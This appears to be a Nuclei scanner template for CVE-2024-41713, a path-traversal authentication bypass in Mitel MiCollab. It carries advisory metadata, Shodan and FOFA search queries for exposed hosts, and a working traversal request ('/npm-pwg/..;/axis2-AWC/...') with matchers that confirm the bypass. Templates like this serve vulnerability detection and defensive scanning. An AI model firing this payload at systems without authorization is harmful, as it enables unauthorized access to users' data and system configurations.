id: CVE-2024-41713 info: name: Mitel MiCollab - Authentication Bypass author: DhiyaneshDK,watchTowr severity: high description: | A vulnerability in the NuPoint Unified Messaging (NPM) component of Mitel MiCollab through 9.8 SP1 FP2 (9.8.1.201) could allow an unauthenticated attacker to conduct a path traversal attack, due to insufficient input validation. A successful exploit could allow unauthorized access, enabling the attacker to view, corrupt, or delete users' data and system configurations. impact: | Unauthenticated attackers can exploit path traversal to access sensitive user data, system configurations, and corrupt or delete information. remediation: | Update Mitel MiCollab to a version later than 9.8 SP1 FP2 that patches CVE-2024-41713. reference: - https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2024-0029 - https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/?123 - https://nvd.nist.gov/vuln/detail/CVE-2024-41713 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-41713 cwe-id: CWE-22 epss-score: 0.93912 epss-percentile: 0.99885 metadata: verified: true max-request: 1 vendor: mitel product: cmg_suite shodan-query: http.html:"Mitel Networks" fofa-query: body="mitel networks" tags: cve,cve204,mitel,cmg-suite,auth-bypass,kev,vkev,vuln http: - raw: - | GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - "Available services" - "Service Description" condition: and - type: status status: - 200 # digest: 4a0a004730450220621f3dbfbaaca6097c9de40768a9c23cbb4c2994544ea3efeeaa5b5c88dd702a02210087e7444c3f29c9a88aaf89149557c904b13586366da8d9d06e880607e8be2c27:922c64590222798bb761d5b6d8e72950